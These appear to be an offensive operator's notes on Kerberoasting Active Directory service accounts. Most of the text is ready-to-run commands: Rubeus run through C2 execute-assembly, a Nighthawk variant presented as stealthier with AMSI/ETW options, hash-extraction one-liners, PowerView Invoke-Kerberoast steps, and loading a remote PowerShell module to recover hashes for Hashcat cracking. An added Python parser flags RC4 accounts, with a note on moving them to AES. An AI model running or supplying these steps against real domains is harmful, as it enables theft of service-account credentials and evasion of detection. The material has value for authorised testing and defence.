.Net - Rubeus

execute-assembly /pipe/ANY/4.5/Rubeus.exe kerberoast /outfile:C:\Users\allem\Desktop\08-30_1606_spns.txt

Stealthier version with inproc-execute-assembly in Nighthawk:

  • Outputs to the console only, so run clear first; when the command finishes, press CTRL+A to select all and copy the output to collect the hashes.
clear

inproc-execute-assembly --no-amsi-patch --no-etw-patch C:\pipe\Rubeus\x64\4.5\Rubeus.exe kerberoast
  • One-liner to extract the hashes from the copied console output of the command above, saved as output.txt (it joins the wrapped hash lines, keeps only the Hash fields and de-duplicates them):
cat output.txt | dos2unix | sed -E 's/^[[:space:]]*//g' | tr -d '\r' | tr -d '\n' | sed -E 's/\[[^]]+\]/\n\[X\]/g' | grep -E '\[X\] Hash' | sed -E 's/^\[X\] Hash[^:]*: //g' | sort -u
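The same extraction as the sed/tr one-liner above, written as an added Python example (not part of these notes): it joins the wrapped Hash lines, de-duplicates, and also reports the etype of each ticket so RC4-encrypted service accounts (the cheap-to-crack ones) can be prioritised for moving to AES-only or gMSA. The sample console output and all hash values below are constructed; only the "$krb5tgs$<etype>$" prefix and the line wrapping are assumed to match real Rubeus output.

```python
import re
# Constructed sample of Rubeus "kerberoast" console output (not real data).
# Rubeus wraps a long hash across indented continuation lines, which is why the
# one-liner above strips leading whitespace and newlines before grepping.
SAMPLE_OUTPUT = """\
[*] SamAccountName         : svc_sql
[*] ServicePrincipalName   : MSSQLSvc/sql01.corp.example:1433
[*] Hash                   : $krb5tgs$23$*svc_sql$CORP.EXAMPLE$MSSQLSvc/sql01.corp.example:1433*$00112233445566778899AABBCCDDEEFF$AAAABBBB
                             CCCCDDDD
                             EEEEFFFF

[*] SamAccountName         : svc_web
[*] ServicePrincipalName   : HTTP/web01.corp.example
[*] Hash                   : $krb5tgs$18$svc_web$CORP.EXAMPLE$00112233445566778899AABB$11112222
                             33334444
"""

FIELD_LINE = re.compile(r"^\[\*\]\s*(\w+)\s*:\s*(.*)$")
ETYPE_PREFIX = re.compile(r"^\$krb5tgs\$(\d+)\$")
# Kerberos etypes: 23 = RC4-HMAC (cheap to crack), 17/18 = AES (far slower).
ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

def parse_kerberoast_output(text):
    """Return one {sam, hash, etype, etype_name} per unique Hash block."""
    found, current, sam = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                      # drop indent and any '\r'
        m = FIELD_LINE.match(line)
        if m:                                   # a new "[*] Field : value" line
            current = None
            if m.group(1) == "SamAccountName":
                sam = m.group(2)
            elif m.group(1) == "Hash":
                current = {"sam": sam, "hash": m.group(2)}
                found.append(current)
        elif current is not None and line:
            current["hash"] += line             # continuation of a wrapped hash
        else:
            current = None                      # blank line: hash is complete
    unique = {}
    for r in found:                             # keyed on hash, like `sort -u`
        e = ETYPE_PREFIX.match(r["hash"])
        r["etype"] = int(e.group(1)) if e else None
        r["etype_name"] = ETYPE_NAMES.get(r["etype"], "unknown")
        unique.setdefault(r["hash"], r)
    return list(unique.values())

def rc4_accounts(records):  # accounts to move to AES-only or gMSA first
    return sorted(r["sam"] for r in records if r["etype"] == 23)
```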

PowerView Invoke-Kerberoast: Error-resilient method

  1. Collect the SPN data in “SPNs-RAW.csv”. This way you don’t have to kerberoast TWICE if the hashes aren’t immediately available.
Invoke-Kerberoast -OutputFormat Hashcat | convertto-csv | Out-File -Encoding ascii 'SPNs-RAW.csv'
  2. Load the CSV data back into PowerShell for parsing. All of the remaining steps can be done OFFLINE if desired.
$spn_data = ( get-content .\SPNs-RAW.csv | ConvertFrom-Csv )
  3. If no errors were received during the first step, just extract the hashes from the data as normal:
$spn_data | foreach { echo $_.Hash } | Add-Content -encoding ascii -passthru 'spn_hashes.txt'

Fixing hashes/errors (if needed)

If you received this error when running the first command:
  - “WARNING: Unable to parse ticket structure for the SPN <…>. Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq”
  - Or if you have “TicketByteHexStream” data instead of “Hash” data/fields in your output

  1. Import this module to get Get-KerberoastHashFromAPReq: https://raw.githubusercontent.com/leechristensen/Random/master/PowerShellScripts/Get-KerberoastingHash.ps1

  2. Run this command. It will output two files:

    • “spn_hashes_fixed.full_output.txt” - Contains all the fields so you can match usernames to hashes after cracking.
    • “spn_hashes_fixed.hashes” - Contains only the hashes, for cracking with Hashcat.
( $spn_data | foreach {  echo $_.SamAccountName ; echo $_.DistinguishedName ; echo $_.ServicePrincipalName ; ( Get-KerberoastHashFromAPReq -Hash $_.TicketByteHexStream -HashFormat Hashcat | Add-Content -encoding ascii -passthru 'spn_hashes_fixed.hashes' ) ; echo "-------" } ) | set-content 'spn_hashes_fixed.full_output.txt' -passthru